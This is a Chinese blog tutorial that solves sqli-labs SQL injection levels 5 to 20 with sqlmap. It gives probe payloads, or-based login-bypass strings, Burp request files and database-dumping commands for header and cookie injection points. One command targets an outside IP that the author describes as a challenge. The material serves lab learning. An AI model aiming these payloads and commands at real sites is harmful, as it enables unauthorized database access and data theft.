对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)

个人简介:
萌新一枚,渣渣一个,全程划水,会喊六六

本文断断续续已经写了三天了,其中查过很多其他人的博文

但是发现大多数人关于sql-labs使用的都是手工注入,

由于自己太渣,只能去找工具去注入(QAQ)

希望各位大佬不要见怪呀!!

不论喜欢与否都可以留言哦!!!!

关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式

关于sql-labs中的1-4我已经在另一篇文章中写出具体的过程:

https://www.cnblogs.com/lxz-1263030049/p/9363151.html

sqli-labs:5-9 需要判断注入方式

具体判断方式如下:

1:用于验证时间延迟型的盲注:

?id=1’ and sleep(5) --+

2:用于判断布尔型盲注:

?id=1’ and 1=1 --+ , ?id=1‘ and 2=1 --

+

再根据回显的不同进行判断:

主要使用的语句:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0

或者:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs --batch

其中的—technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入

B:Boolean-based-blind  (布尔型型注入)

E:Error-based   (报错型注入)

U:Union query-based  (联合注入)

S:Starked queries   (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

T:Time-based blind  (基于时间延迟注入)

我们可以根据不同的报错提示更改—technique后面的字母

其中的—dbms : 不仅可以指定数据库类型,还可以指定数据库版本

--batch: 用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。

-v 0参数只是为了更好的截图.

第八题:

使用语句为:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs –batch

或者使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --current-db --threads 10 --batch --technique BES

就可以得到数据库的信息

第九题

属于延迟注入的题目(具体判断方法上面已经给出)同样也可以使用上面类似的语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T --dbs --batch -v 0

关于第11-17:

都是属于post注入的问题,只是内部参杂着盲注的问题,需要使用burp火狐浏览器的HackBar都是可以的·

第十一题:post注入,基于错误 - 字符型

根据post回显的值就可以进行sqlmap的跑测

使用的语句为:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=11111 &passwd=111111 &submit=Submit" --dbs --threads 10 --batch --technique ES

其中的:

--data:后面可以加上数据段(post/get类型的都是可以的)

--threads:最大并发线程,盲注时每个线程获取一个字符(7此请求),获取完成后线程结束,默认为1,建议不要超过10,否则可能影响站点可用性

下面的只是需要常规的操作就可以了

第十二题:

也是类似的过程就可以了:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit " --dbs --threads 10 --batch --technique E

或者使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or("1")=("1&passwd=")or("1")=("1&submit=Submi" --dbs --threads 10 --batch --technique BES

第十三题:可以使用语句:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=‘)or(‘1‘)=(‘1 &passwd=‘)or(‘1‘)=(‘1&submit=Submit" --dbs --threads 10 --batch --technique EBS

同样也是可以得到答案的(其他几个也是类似的手法)

第十五题:布尔和时间延迟的盲注,

简单的注入语句为:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=‘or‘1‘=‘1&passwd=‘or‘1‘=‘1&submit=Submit" --dbs --threads 10 --batch --technique BET

下面就是属于sqli-labs 18-20,

这三题主要时关于http的内容

常见的HTTP注入点产生位置为

【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】

第18题:报错型,单引号,user-agent型注入点

由于这一题时关于user-agent的注入直接使用语句:

python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BTES

关于txt的内容:

POST /sqli-labs-master/Less-18/ HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/sqli-labs-master/Less-18/

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

Connection: close

Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

就是属于burp里面的内容

-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)

或者也可以这样:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch

--user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息

sqlmap 检查uesr-agent中的注入点, 

lever>=3才会去检查user-agent头是否存在注入漏洞

第十九题:报错型,单引号,referer型注入点

这一题的做法如同上一题一样都可以使用:

python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BEST

只是存为1.txt的文档变成了这个:

POST /sqli-labs-master/Less-19/ HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/sqli-labs-master/Less-19/*

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

Connection: close

Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

另外也可以使用这样的语句跑出数据库:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch

至于里面的一些内容上面已经有一些介绍了

下面是最后一题就是

第二十题:报错型,单引号,cookie型注入

对于最后一题,我就用一个最近一个看到的一题结束吧

题目链接:http://202.112.51.184:16080/

直接进行抓包看一下:

Cookie有问题,直接使用sqlmap进行注入‘

python sqlmap.py -u "http://202.112.51.184:16080/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

--cookie

web应用基于cookie的身份验证,对于post请求,可以指定cookie

sqlmap -u "url" --cookie="..." --level 3 –dbs

参考文章:

sql-labs Less : https://www.cnblogs.com/peterpan0707007/p/7620048.html

sqlmap注入总结:http://blog.51cto.com/wt7315/1841241

SQLI-LAB  的 实战记录(Less 11 - Less 20):https://blog.csdn.net/qq_21500173/article/details/51920968

原文地址:https://www.cnblogs.com/lxz-1263030049/p/9492583.html

时间: 2024-10-07 20:08:50

对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)的相关文章

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

WebBug靶场基础篇 — 02

本篇以第一人称记录这个关卡的第 1-5 关. 由于我记录的过程有点偏向于思考,所以截图截的多 = =!所以文章有点长... 下午一觉醒来,已经 4 点多了,然后开电脑,在虚拟机里,铺了铺靶场,但是毕竟我本子太卡了....所以只好在主机上玩了... 打开关卡的首页. 点击第一个关卡,普通的 get 注入,get 注入就是普通的注入,咱们常见的浏览网页都是属于 get 型的方式 . 进入第一关 ... 继续点击 ... 我第一眼注意到了上面给的提示 ,搜索型 ... 如果是搜索型的那注入的 sql 

渗透学习笔记--基础篇--sql注入(字符型)

环境:dvwa1.7数据库:mysql前置知识:sql语句(Click me)      在进行sql注入前,我们先熟悉熟悉select语句.一.打开我们的sql终端 二.进入之后可以看到有mysql>我们输入sql语句,即可返回我们想要的结果,注意分号哟!我们使用的dvwa,在我们前几章设置的时候,会在数据库中生成一个dvwa的database:这里我们使用它来进行我们的select 语句:(1)使用dvwa数据库use dvwa;(2)在users表里查询用户名为'admin'的所有信息se

前端工程——基础篇

# 前端工程--基础篇 > 喂喂喂,那个切图的,把页面写好就发给研发工程师套模板吧. 你好,切图仔. 不知道你的团队如何定义前端开发,据我所知,时至今日仍然有很多团队会把前端开发归类为产品或者设计岗位,虽然身份之争多少有些无谓,但我对这种偏见还是心存芥蒂,酝酿了许久,决定写一个系列的文章,试着从工程的角度系统的介绍一下我对前端,尤其是Web前端的理解. 只要我们还把自己的工作看作为一项软件开发活动,那么我相信读过下面的内容你也一定会有所共鸣. ## 前端,是一种GUI软件 现如今前端可谓包罗万象

oracle(sql)基础篇系列(五)——PLSQL、游标、存储过程、触发器

  PL/SQL PL/SQL 简介 每一种数据库都有这样的一种语言,PL/SQL 是在Oracle里面的一种编程语言,在Oracle内部使用的编程语言.我们知道SQL语言是没有分支和循环的,而PL语言是为了补充SQL语言的,是带有了分支和循环的语言. PL/SQL 语法 基本数据类型声明 declare v_name varchar2(20); v_temp number(1); v_count binary_integer := 0; v_sal number(7,2) := 4000.00

Hybrid APP基础篇(四)->JSBridge的原理

说明 JSBridge实现原理 目录 前言 参考来源 前置技术要求 楔子 原理概述 简介 url scheme介绍 实现流程 实现思路 第一步:设计出一个Native与JS交互的全局桥对象 第二步:JS如何调用Native 第三步:Native如何得知api被调用 第四步:分析url-参数和回调的格式 第五步:Native如何调用JS 第六步:H5中api方法的注册以及格式 进一步完善JSBridge方案 思路 实现 注意 完整的JSBridge 完整调用流程图 另外实现:不采用url sche

网络基础篇----计算机网络基本概述(1)

享受生活  热爱挑战                                                                刘明远分享    一   计算机网络基本概述(1) 每章一段话: 不要让自己闲下来,给自己找些事情做.哪怕是看看书. 正文   (提示:本章内容比较无聊,最好当看故事一样来看,不必记下只需了解,内容基础) 1什么是计算机网络 号称新的"电力火花"是以计算机.通信.信息技术为支撑的计算机网络技术. 计算机网络将两台或多台计算机通过电缆或网络设

js调试系列: 源码定位与调试[基础篇]

js调试系列目录: - 如果看了1, 2两篇,你对控制台应该有一个初步了解了,今天我们来个简单的调试.昨天留的三个课后练习,差不多就是今天要讲的内容.我们先来处理第一个问题:1. 查看文章下方 推荐 这个功能所调用的函数源码其实非常简单,点放大镜选中那个推荐即可.这个  votePost(cb_entryId,'Digg')  就是推荐按钮所调用的函数了,是不是非常简单. 第二个问题,定位到函数所在文件位置.其实也是非常简单的,当然,不熟悉控制台的朋友也许不知道怎么看.我在控制台输入 voteP